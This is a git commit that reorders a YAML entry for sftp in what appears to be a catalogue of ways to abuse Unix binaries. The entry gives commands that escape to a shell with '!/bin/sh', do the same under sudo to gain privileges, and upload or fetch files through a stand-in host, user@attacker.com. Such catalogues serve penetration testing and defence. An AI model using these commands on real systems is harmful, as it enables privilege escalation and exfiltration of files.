Reorder functions in binaries

This commit is contained in:
Emilio Pinna
2018-07-04 19:26:52 +01:00
parent 80b20b6991
commit d6895f367d
81 changed files with 1171 additions and 1123 deletions

View File

@@ -1,25 +1,25 @@
---
functions:
execute-interactive:
- code: |
HOST=user@attacker.com
sftp $HOST
!/bin/sh
sudo-enabled:
- code: |
HOST=user@attacker.com
sudo sftp $HOST
!/bin/sh
- code: |
HOST=user@attacker.com
sftp $HOST
!/bin/sh
upload:
- description: Send local file to a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save
- description: Send local file to a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save
download:
- description: Fetch a remote file from a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
- description: Fetch a remote file from a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
sudo-enabled:
- code: |
HOST=user@attacker.com
sudo sftp $HOST
!/bin/sh
---